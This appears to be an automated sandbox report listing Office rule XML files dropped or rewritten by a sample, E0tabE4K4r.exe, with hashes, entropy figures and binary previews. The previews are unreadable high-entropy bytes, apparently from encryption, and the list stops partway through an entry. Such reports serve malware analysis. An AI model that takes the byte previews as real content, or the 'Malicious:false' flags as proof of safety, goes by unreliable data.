                                                                                                                                                  Preview:<?xml..Nd6.|..[...2.F..ii.....bA_...~-.6_...,.n.........u..}.]m.....O.a?Z.......Q+....?.....;Eo.........J.wl....tE,...L.s#...d%..../Xv.6.?z.b....D..+.Ap....-;.E{.Jx..c........^.1..9....:,.L{e ...........go7....4I....w........:....6......R..U8.\d.<W....dE.r.I.Ye....P.~$.r.P.<..2.......(...f"./.dZ...n.........W../.6..f...q.H...pW..D8Z.X.m..O%.WY..'f..8v.7.WO..1R.z.u..q...@..B..p.......o.e.._<@e.9..V.........!.P..@..I...7.{..o.c...&...:...../.N..$>,f.D.....2.CS.Gd9.BPA..xeo.,,.e.....(?......A$h..N....*..d4.h.}t,.i$..M.+.)...r..@...3...zx.....x.]....`.m.:...D..2....HgSp.9-.L.......D..J..f.a,.H.w....C..c..wixz.$[....|...G..|.I..\..Ls4.x...j.aN.[P6.N..3xt...P............J....t.T.v.'{.S'..02......I.y...54.v..y..O4Z.-..@......`.h~..t..=..........]y.CQ...o.Z.;Q.%..0.o.3..k.....u...1.....k5...O`..a..BC..... .'........D...}.pG...xH....5......h..C.dL.....T.......r.x...}.|.....W..ZX.#.......... .n...}.i.9.vz...yM.....R....J...P....?...5.(p.T

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703051v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1761
                                                                                                                                                  Entropy (8bit):7.879653691873914
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:LArzRzR+r3ps2v1WGyEfGEarZ/d4kqV0seNDa6oCXvpZxZtifQJH71a62bD:6Pq/v1dyEOtV4kq2selaBC/pboQh0D
                                                                                                                                                  MD5:9A05B3BCC5FE8B519E635760795EB677
                                                                                                                                                  SHA1:6C0715843490DE6577D61353B2A9312F739A3554
                                                                                                                                                  SHA-256:FC793DABA85A335B0ABF9323B75BEE267EF75F2A8A230539D65301DEBB4B1A9D
                                                                                                                                                  SHA-512:988344AF94D3237F1B1DDB254EECBEA0C80418ED83BC4CAA4E471687C494309AE00023C659A49B40E57FF8C9E063DD817B514127B16B1E2DB0BCCA3E3E4F351D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml7G...5.eX,..y...w.9C...&0....K(GV...rm...8X]%.)...-...Y...P.W.....p.....Q.....BK.@..?..D.+W..Vt....R..g.[.rV.M.e.W.T@.yhL.*......$....S K6......Hb...k.9<.q.*....R..Br....M-i...k...7}.. n.[..Xo....].v....<..f...j.mJ...l[.W....x{.lP.0...w...t..O*......L..O...u..n.r..ICH.RQ?.p..X...[J..`5....b..;|I....L...9>....c......~.LA.B.*l...T9=...._..GC..U'.h............'..{.4..EmX...%.............|..C..M.cj."X..Q![..\..r.KL...U....a...Ew..w..~.UV..'....e.3}m..,\F......CB....uI.W....."...Ku.I..t)...LRR )..<.d.ikN.=....D......-..........YF...<|.+8\=G G.10X...YYL......u.@.......]>.4K)......v..\.6...%..1p.hDFz6...LW7.x.;..Az.4..1s..~...o.?jrk.#W.V.|e&.3.a.k}..av......#B.$.%R..V.../..^#.`.R.i.a.h.....e..o..:=..&al.Z.\+...Q.p.z...Z...d9.0*.......C .....)....u....w...........=......W....x.{....L....a`*....h .De...(.S......z.R~.......s=G.@.....8..W|......%.R...t;.NM<..uj H.E..g|+...1.A.p.+..{AQ....y3N...R....:....h.B... ...-.Y.#/l)...\r nZ..-..s..v. ..@z.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703100v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1689
                                                                                                                                                  Entropy (8bit):7.8824124916480445
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PtEt1EHKtFQXNi2btn/hpBSWkwYrJNH2D6RhPWhz7YAkzrVmMDaOsXrwBp5ZBEZ8:W1Eqt3spmwYrJNCjx+z24HBjD
                                                                                                                                                  MD5:7BC484C3953EB431C8F86D079E65BA95
                                                                                                                                                  SHA1:0D139684DB8FB873B099F4393B7370A20B5738D5
                                                                                                                                                  SHA-256:CF293A3264D153DFD23F75A9D0336CFF9FC1DD7231CC399812D5C6B38375AA27
                                                                                                                                                  SHA-512:59814A7D12685D89DCEC9AFD5AA508D50DED7ECA7C529627E52537527622EC856E6DC21C836B45EF84422BE92DC681D839AA3E9491FF069570AD108E8DAA83A1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlO.y....Y.M.v...i..P.T |!...x`.X...tZ%u.[%EO9./.......W.....0NH*.]\..... \-?I..f.5.....y:g..J:P......W..}.9zW= u../..S..+.r..;.....*.t..>X.....}.`$..\..o..w.5...-4[.......J..b..>....r...V..[j......)..^;l....~.....-?xTbrW....k/....n..J.g......u.....e.QT\...q.W.^..C......d.lt{..rFH..jy.Q.v8.F..@!.@.....o6w.[...K....Jk..aW..F5.F."I......9q.b.8h....%t...lH-.....}I.....P.@Tk...,.|....r...uyTZ]'`...q.G.~.......M.0K...h.M..\G.....V.y...u'...X.iE..'9...}...]...)o.|$.@..v.0S....E.O......`#{.cDO.....Gx&DwZ..._../....:!....C8..A].......,.c...MQ$...(...c6gtk....gx.[.....Dc,..:*...Z$.m._T..5.e.@_....g..(`.E...z.l...]..ES....p...X.AO............%....z...*vW.....{......R.-./.......QL......nI.......2.l.F.."V{..2.6.-...&.&.B.e.te..Gy..l..%T~.Gm..k73.!..z.W.f.C.46)..........]BD...rW............W......1I.q..|..J.T1..uL+....]5.....@......9$...US<..7.w.L....#..0.M]I...N.a.Tj.....s..?....W..".B.y.}.....byO......g..._.Z..+...Q6.qJ.%e.....a._.%sQ.2..s~...n.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703101v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1726
                                                                                                                                                  Entropy (8bit):7.87670720316087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/3kvrF0vUIGYz/9x+Pmi6QPCKKTSGW/PPD:PWF0bemiH6xT3ID
                                                                                                                                                  MD5:C4A94D36BDB31FB5B9904B4ECC201895
                                                                                                                                                  SHA1:130539A6BE39950C7C5E7510C6038F3E387E9899
                                                                                                                                                  SHA-256:639A800028D844F4DCC42355E3A2957DB3DF02D01C2BB347EE20B85972720429
                                                                                                                                                  SHA-512:6FD757C5945264BF813424D7F7415B9CD2BB73F6E25CBE25A6376857A2969A5F84481C0857E7407DF1CFA7DEF6DB3C0B60F2849767A7ADB31235E3F5DAF52860
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...VW4~o.N.s...qA.e...{.P=...xU.K....o!=(......"...h...OoDt..0.VS.....2.p\k.....W.[@t.Yw.....d...,.6.*.....dd.1ar.Z.....v.I$d.;.....7.a.u..\(tW.U.cT..v4....:.^....&;.H..8.k.*..C.\..(416...{..E..A..pp...W./YL.}.R..]Vq....W.%5...(.5..... ,..y.....L........[..b.+MZ.'/.0..Z..$.Rg.3h..e.-x{T....i..k.J`.r+J....k&..R.(>t..I...w..@..t[m.%.!z*.9...z.....T=......8w{.........d.{5C.."..912...@..EY.Q...E\......v..{.0.p......9.z.k....f...-...pjC>..OS1&...9...d.i.(.....R..]Yz".*.]B}..3.......8..<.8..)i6.r.jI.!....v!...qU...`.~....v..m....%.]...c..M..*..y.V..W.&.......2...b$hh.'.....t....>I$C....0.l...J.(V.....y./ECB...^......*.&.U..y........l.N..~/.N.K_Y^l.+.h....@..Gv.&.h.e....`;.X.o.._I...J.p1.}..F.i(.....r..\X.'....W.|&.....9..f5]oo.t.4<...@...u;6u@....1Y....W.D{...%.....Qm.T...Zj.;..)rd3..\..tcS....P. N...2^`..T.Dx....U_..8_|.W..7..K.L.=.....~+h...a."`....Gu....3....AF.............(b..u...R...[..rq..p.p[.(;...L...O.......R.U..~O@x.{..L...#g<.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703150v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1707
                                                                                                                                                  Entropy (8bit):7.889959115001061
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:6GspYPkXcEVKWjYGoWXAMI7YRiuR28STNJIeA4P9Ji02YXU/zx3iEDjObpg7XsrE:61cisGoW6+RuJIeAe29yz+Xs0Ix1CTD
                                                                                                                                                  MD5:FA7B17A8FA9B771D14E4D761A7D7CB72
                                                                                                                                                  SHA1:4951E457C70F33B756A51854E83371B287C9DA84
                                                                                                                                                  SHA-256:D3C40EE8254045D3BD7E555507B6F8240E71345DBC3FE9B858B0DDB6B79A03E7
                                                                                                                                                  SHA-512:6A0E15FDE222578B3DEDE01AEDDE642B953592881768C652CD139BD4E4FFAA9665FD8C54884031036C7C76B30CEB6CEFA6E8AB8450EB4848AD14AADEAE5DA29E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml........lYw..uT*.:....Uy.=M$......3......... 1..6.J...?......r.>{..U.....Vu.z}...#..-Y.x.?t....[...$.{.._.......e...{...[...9..*..J.....z,!K...gZ.9..mog.b.i...F.Y..R1Bq...."..q......5a.s.G/.aD.++7.BnN..d..S.......$.....'..^..U5...g.l*..aU.~.p'|:B...L#E4.K..+.z.]......xZ......^.q..i..N.>;{.[..y..^0.+.$QBY.M.CS.kV..;....t.8.1.I........g..U.~.....LS.........w^..n.q.qBt..Q.o.l._VLv.*.....*..qa.......FG5w..?.r.W@.=...o...1..;L~r[@(.!..&.......z.L..~..R...'..ssz.fS.R.*./.....gM...i5.A....FT.....3N..;:...#@x.h..]........5....J.-.......;R.1.O.[...aJ.x.!.....#%...W......R.q.h.....\....9.....V`."...z.m.j.....$M.7..".i.~..`Um+y..GQqI....2..%W.......4\\.*$<..B.T..I..p........".p./.<D.....e..R4o.x.6.. ........B.s.C@.:.k....K...b...........Q...P.=.z.I.....o......pW..&..2..."...$.....n......X...kshU..1....pf*.H...&...7d.4.A.B...).<o...m.B...\.U/....g..f.ZB..!...[.....p...kh.x..h.1.-.8}lIZ......!o...o......n...2....0../........_1.h.7.q.$H}O.7E.a].-....[..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703151v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1744
                                                                                                                                                  Entropy (8bit):7.888734362416049
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:K+PQ0JAkZcGa8prf3y01yLX6dtn3gPd3QHrhfQibD:/FJpZrhr311yLKLnwPKHrhYU
                                                                                                                                                  MD5:C0769FE8D9109EBD148A35B0C10ADAF3
                                                                                                                                                  SHA1:673FEB43E205E964EF30B11F629994D63ED93B41
                                                                                                                                                  SHA-256:C6998DEBCF04CF63E611789894E32783040BFF91ACE8C6043220B1F82B705BBD
                                                                                                                                                  SHA-512:04C706782D67056D63C5472C1F8B8FEC9B8A79FA0B796A8E23B2ACFDD0E9C4BB9F4EA74D44853DC9D815581D60DEFC7CFD367C80EB5C9788EA36BD9E65E15778
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlA?l'...O...B0.....q...>//.n..o...Ff...+,.....8...2A.+.....k.:W..?gf...(.n....r..Z~m...^*.o..z.................t9..?DBX5.P..H..^..%...ut.....0.n...E~L.O.W.yg...~i.x_..O....7...+V.e.Q..jM.oQ.Lj...`.....!k..c.0.mw............p.J....&.....D.@..J...!....\....Z..qv..w}....7....g-({Ay..H2.[.<..:..!%.x..n...].. 8..y.'....}.ES.A....|....n....X.....*.+.H{].=...q.2..c'..9.{..('.....%9.@.zk..Mly...E...Ygkz..l.\...3p..J.d.Mg..7.:a.pk..w.....v...%.*wS2*.+.c.v...j".ft..i...z..I...u...2=.sP...@<B]..ly.JB>.P..T.E.0....MQZ%...+$.e..K#...?s....W...".. ...k..>vW_f........W...aN..].:%.Db....~......E.....\.G.ZX...-..'...d|Fz.......O....ie.r..u..;.E....Y....7Hf..d.0..M...:...x....8..D..I..K..^2...l.}.8...CN.S.f.GRF'.....eWb....``T.C........[(.>.h,.#..R. ..9...>..x.,..V.5..LE.....t.A[.p..mL.._.T....ZU.c..+.'.e....]o.P0.ZIl.t..u~'Y.....$#..;h... .@.n%<Q..~...LeH..Lj....]....S...% .<.{...j..]..l..R..yU..-../.Z.[.\..Jr.*/.@g.x..Ns.....XO..{f..j..X0..:..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703200v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.895087028199283
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ulm9EcTSltPB2RRm41iaXb0CNzevzvmqB/BXRhUKEl00KVbGbRoYpLTDs2aMR78W:ulmxItP2r1uCZervjbUhQYpLvr8uD
                                                                                                                                                  MD5:9193401D2ACCBEAB0FC82C2C16921501
                                                                                                                                                  SHA1:F4C5220C003E139EFF8BB1FBBD8197C9DDBF5390
                                                                                                                                                  SHA-256:6DA209E04A9E2FDB01F553DFE5672B82312080CF3359907830D4FDA391709448
                                                                                                                                                  SHA-512:48CD4C579FB3AE8FF152B69C7B2728FD7FCC37EC1F0AD8FF5183169237365D53D290EF9B6756E9D33C9ED25559D67CFBF447E3396B198E9389E9EE62516EDBD9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......|I@..8Q.<..f.K.}>..#..G..0p..B....._....N..... ...(....;)...4.1..9x?...g.....g.. .).fcSr.Oh..n.....,F.........(.....6....p9.YI.qle.e..?...!..I.......I..}...~.....\.&E..........U.Vl....(..)... Ux2}..Q.x..+.R.%.X.[.....\.S4&...y.7.(.J.Nk....(.N.p-.H..E.g......F5ZMzz...W6....?'.iy|.jo..m5G.2.../.>K.G\ ..m.X...=.a'..........fY...a-.;..U5...X3w.\..S`...v..........e.......zt.....F.z....k............}.....1...$.mp....|.~....O. 8.{.....8Q.v..^{N.....*...:H{.!\P.....4.0....>v...?K...[E.0..)..*.lO.:...U.o...:.e.....C..cSX.s...(...w.{.Na/s...(..}5..7...M...J....B&sCU.^.......me<....F.s.m.AH....P....hdR.../.'.i.R............Ah......N~.......1...g...m..t.Z@1...S....*X.#.9..G...,.?..9......3...Wl.._.zU.G....1 s..*......DrA..%.$m...[}>BX...y....[..J...-....v].........M\i_.l.b..D,D.[......{2.gj.f%O3.wu[`..IVXd.Dj.......h..8.8.}.x.-...&i.hK......rn......e.......Z3...o&...R&EuF.[.=..P.G...PnQ..Tl,.."..).._q.W..o..\...RH....[.1.X{...<)....BF....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703201v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.887711055297644
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:u+dHJ41K7PdV7kO77Lc5iDsl9TGKkj9AcMuPD:PNJfFp77Q5dv6BA2b
                                                                                                                                                  MD5:026356D3F03E313319065D2B1167F606
                                                                                                                                                  SHA1:55A82FC85589887E8372BAA6F2DA05AE98CC9A32
                                                                                                                                                  SHA-256:C0D1FEFE6B24862AA1BAC2FA39D09BEEA4D808474E2FDA73E546EA8565294620
                                                                                                                                                  SHA-512:C46856534414007727DAD4BF102C7CF085EA887B29559FC3A0D9374F89BA5F1E8DB009CB835AD6CB494BDB086A39825372367081DD10D92447DB2F8AC1B80CAB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.1T'(h.:U).d.Y..i4..>%}I..].A.`]...b.@..F..8.Y.6.7..!.Y...O....O.uS2p.)..@.=..|...3.Q.!...F_zD....P.]".............Sc..L.#(.p...p........%.k.....?96.A....L.y.*..[..c..B.. .0t.'v...........D......)..wm.q.....4..p...qcH ..Y..Ag...!.t?..o.....'.CY.l.B..E....;J8....=@....^.h.-a..y..............[...e+..d..G.-q6.93.L*..j..}.....2.....2.......H.^h..s.....u$o.C5.Y9.4...x..Y.U...s..R..a.k...]......o.R0..N....$.y.iB.......7.].H.R........m.l..W....zb.).Ai....7.m...a/...Qel,....._..?54Y....`...C.../v....'\.d.v$.,....&..z(......3.....#F.'.(C.`..*.L.:.`BE.m...:.q.Q....(x6...[...%..mL*-.$999.......$..G..].P....4.5.q.a..p1..Mx..,....yu.../... .../.f....}R...z.....H._..X../...,.6...3.[sv&I.^..Z.....?..Q....x...Q.M...#Q+T.I..gxOO.Y@.....h..........4.R.xnI.{j..U5-u..PF$.R...W9.8I.5.....>C^.^P..5+!k). .Hf3...,8.g.<-lB.......j..q...."...3...+..2.D.H%.S..q...W.l5M.h]..[.S2y.u..iAdfy.1\..X......../....n...D..V...Y...0B...i..\Oj......-.;..|....e....s..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703250v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.878628187545033
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aHRmrkQY3EIf4qCRVszssic0NTvMwwGmhNG8kzRmjhAh/wNcBmh97zsB2bD:aH5X6P5LHmi84khAh4N2olz3D
                                                                                                                                                  MD5:9EB17480129B29E1DB88F7807CCE988C
                                                                                                                                                  SHA1:38858D193FAD194854E4B2076167F89B163AE59D
                                                                                                                                                  SHA-256:CFC6CE9A725FD874EAB705F58DA742633FDE08D6BD66AF44A4C198DF26B2967A
                                                                                                                                                  SHA-512:1E9565EBA4AFD0A1DFEFCB9ED59A865A6D0FC91ADEA7F884FD9ABE5E0352B54FDCBC79B3A5D710C8F8C1FDF161CA0AF59526DE635B74E03A92FDDD53C7C5F193
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlZa..iM&I.s...V....<6.........[..+..%C./...B.T..A..s..s."a.d...<.g...B.81hea.M.v...O9jrS..Y...%y'....]q..r..H...V.l.G`...o(.[U..S.@..1.Kg....g.<.|q..%..Uc.v..u]^.....Y.Qb..3e.......w<..e.........H.1.z.i...L.(._...UC.jU..I.C.?..1.)A.......lw..8./`...I.....b..#.....VB.......-H.4.......a..Iw.L.`.....D.?3.....E'.(y.QWo..I..KP..[..mx... .p.....gb.v*.H......oN,.Z..B..jlP0eVB..Y'c3b@..1e&zNFq.$.v....S..?.....G..n..^..QrP..Z.f.L.:.oYtV..L....{.S...i.?G.o...n_....M]... .0...f}......"ny....B..&a..... g...R .9......9.Z."K.8..6..x.u...O.v.U.;...?...8..7.x..by.l.c..^=...n.Mr...J......^>.NbTl...HT.m(.r.an1....`#"..s......#.[..n.(.T..V...S..Up.}.K..A.(.<P...:.......`...9..(..n...9|./8.Q.u.>.@k....g.T..S$.U......,.....IMv........W....xi_.x...}..vKY.h...0L...66.D..../+.W..Xp.w.b!p.9......:".E%.....:...:..2.xM(....@..g;..$.!j..5`..W..u.V....x..K.z..(l....6.k..+".Cb.K.!cCq.k..b........Qv.p.w.x.,..r.U.;\..CG..._s.rA.A$..:..}....9..F..H....c.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703251v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.89152512588121
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:dapmaMJJl0iTeBjLTbS4w7Fym+iD3okxFbD:d2zMJP7KLe4wrD3B
                                                                                                                                                  MD5:C65FEB0770B71B49F8EF9BCACD2A48FC
                                                                                                                                                  SHA1:21211BDECE0E973C5B7DC6893B38716E797D56B5
                                                                                                                                                  SHA-256:A854D907072700330CF81D59518B8CB89F1EF1789B1DE4897159269F990AFB38
                                                                                                                                                  SHA-512:C7C41985F716064BA094C9221C26665668AD3FB13B28E3A3F5F2A3BB23474116B496174C5D6C6932425A18A2932D8319076587F721C02D6FE1F9642E44DBEECD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlt...:....X$.. .).bP.....;.G...t<...^...~.'#.... ....M.i..../..j.!@..?7h).$...N.."k...Qx.I.z...Z.......I%>sK.mR9$..3,YW._?"..=.Q.......W.F...O...M....O.....ee.a...)...v........6...k..vu.9.t.7.G...E#Z.`....!1.._.od.(.&.a.'...e..'S_..C#..XE..Cvrb50..o.c.....[E.O....S.....*..M}...R.Z..J..a.`....U..xx..5s.w,...}.L.X......>...{.Y../..Z.s.F.v...._.....p*..T&Q.<.C.....i.xzI..m.0r..M.....X.....;DmE....|.....L<....8M.3.e...%.eg(7............_.\.F.M....T.`.v.}j4e.&P.;...NO..H.*.J.|.x|.....yV.?.X.$.i...9..N.6...9i..j. ....^....:.l..8C..D.d.A..>..Z..."g.L.....kNS.>.."5....{+.!.G....E.T.B.z....0s.ZB..~........B..?%..`N......./..[..b....<yE.f.Ys.X.f..Y].-;..G..}.0z4...lg.J..>T..N..,..W.G/..U?.0...[.ir;hk.b..<......]Q).....-...cR*.F..k....+.V..../.s.Jo...'C..T......f..|...q{k......jLW4._.*\*cw&.n......../...Gd.....0.....xD.NJG..jn./.....u..r\g;...#.eo}.A......b!.;j...o...=)2.......p..c.*..e;.l.OE.'....</.usQ.8p...oc.4p.!.d.=...<..,.v.b.K.~`..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703300v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1715
                                                                                                                                                  Entropy (8bit):7.892389045517387
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/tW9iZNO+p2MnFX5siEU8FS64UrHzhLO6D:/tKiZNO+p2MYUxdIzhf
                                                                                                                                                  MD5:7E7B54797790DCC9E48C1004FCBE8C00
                                                                                                                                                  SHA1:F8E63A8A4403443BB21F06DD0B27858874FAB89B
                                                                                                                                                  SHA-256:87D4AFF291958D6391750F67E99F4E083A89AFD9B3B477A914FD958BB1E8984A
                                                                                                                                                  SHA-512:BFADD4B7FB43734BBE4422C81A871457CC1C1574DDAA5AF13DF8CCD667043058BF4F2A4ADE54F70207CB2995AF247638F754D60B8D09F5C9846D8D819A96992F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlQ..Q...!..,...kz.*t.I......nF-{RD.Z..Gv...AY.l..}...<P.n.~Q.Z,.liy..?..t....h...r........tW...)....AoO.`..Y.....h@. f......n.Z..."]...u}....8.........U.......c....<...@\%...+0G...K.H..fW..........q..N..i.,R.._{.;....eenn...2y$.S.p...]..........|].*.0..b.q..Wic.Z.5.R..:EOU2k.<.jK.B.w...H#K.Jf..p..]9.0...F....S............I._..+[7...Z`HX...%g...5P...e.5.XoF..UJ@...8..E.K.I...5)...CI.8;.#.x..7....Z}.\.rXL.@...t....P.......?4........=%.ZBO.x. .F.....C.............l..L..CM.........B..5D....H...^#..u.l.r....}.jG.........a%.4.(.-hI.^(.3WQi.......*.o_...d..i....a....R..al.1..h...~....<.J...Z.....'...;..^.Y...eZ.A..sL.e..*\q..[g-........g..p....8.._..U..G.g5M>..)...#U.......).2..!..M.w.S.M=Pv....R.7..T...`....Q!.`..m.v..h8m@...6..^.n.[?L....b,....[....L.........|.Y.f...S.H...RyZ.....,+L6.fd..... ..j,..1..L... P^##.....iG.V(S._...@...:...R!.(R...r%(.@......%-.tA......tT..">.V...K........U.+:V........>'P...........K....A....+.9.$;"Fz.5A.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703301v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1752
                                                                                                                                                  Entropy (8bit):7.880019166173507
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:65T85O72bbB8L7X1uon1FDXOCtw4AWqaXMfqmkD:6Su2bbS/pheCaqqaXCvw
                                                                                                                                                  MD5:747173C0748782EF1FD45A84BA621E62
                                                                                                                                                  SHA1:9565DFB942B546B0FE5C6D61F2156D07D6F4AA81
                                                                                                                                                  SHA-256:7DA39E210F6331A5FF0693CBFA51FEE861DAE3548DEC16E3E278046C3945108D
                                                                                                                                                  SHA-512:DE63614CCFFAF5FDEF91F52B765301C36CBB496FB5763623432A8A25D51234E459B60110D07E30B582D210979EDB639BBAAE1B7C64518A4666ECD69AA2D78584
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.(.`.....Z5..vO.C...N.}..>/.\....z..!...+.x.z...k.. '.o.>...>.v.o]N..U....P.Hj.u...;%..<^.e....%...G..;.T..t4...b'`..w..a..X..t......6u..w....^I.j+u"...G.k.|....4.......-..0..2K...k;.+_..A........"4$.]..b.9.s%.w.Q.S.c....+..]k7..I!1%...r...S"..v.....CZ...p.*.._4...n...:...<.E..p...j9.].G.....&...,...A>,zo\.?%...3....D.o...R<.W...?.Q....T....&|Y.[.:.'..%w0.@t3($.6.t...N..-.....(...E].....|9....|4.pd....7UTK.P.. .F.[0........8|*...X.MT.o.WzC.X.c@/V~..Y....Z..R.._......V._{...-qU..J..[+....I.#3\...8an.N&y..}/...o9.E....._..f.G......^D...}.X.F.iMI.c..a.q....."..r.k..$.G.Bn....s.G.....EP..o..A{.J...w.]z...i...\T.=+a..(.9.Q..p[&.R3.:....|.m..w......+Q.Q.&...#.M..+.A.esa..O..5..%v.K.)mh..a.:..4hw..0.s7..|.6..@.cy?:..'.Vc......l(K..2&....$.../3.DPy9.h.....H....~.D,.z..#....{..9Z..95bs6]........h..........].B.L._.....<..8!x0..5.5..|....HB...D.Y.i.Z...r....x....S.R..jn.j.....>.V....V.$..KI.....Cvt...8..Y..R......Q.u.Zv...0V."=..........P

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703350v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1699
                                                                                                                                                  Entropy (8bit):7.8836242151548825
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:JVtw8+yDxqocBxOuoRJz5+TeFQu2PeHQNxrVcVID:rL+yDUosQRFgleH4V9
                                                                                                                                                  MD5:991B0B068657FE3C56F2E002836CFC1D
                                                                                                                                                  SHA1:C575CC19762556E46209E31372DB59C8A4836D7A
                                                                                                                                                  SHA-256:9B4539653EBA5083601B7D114C7B6ED36D351DFFA6E5F85C4CDA3ED0AF36A9CB
                                                                                                                                                  SHA-512:1A9506F03F6A36BFC3115AF3F4625137FDFF371943B48DE503AE263A8B0ADA3CA2A40683E1775CA4F181A976CB86CA957BC0182C7296DFC2D70CF89F194D0404
                                                                                                                                                  Malicious:false
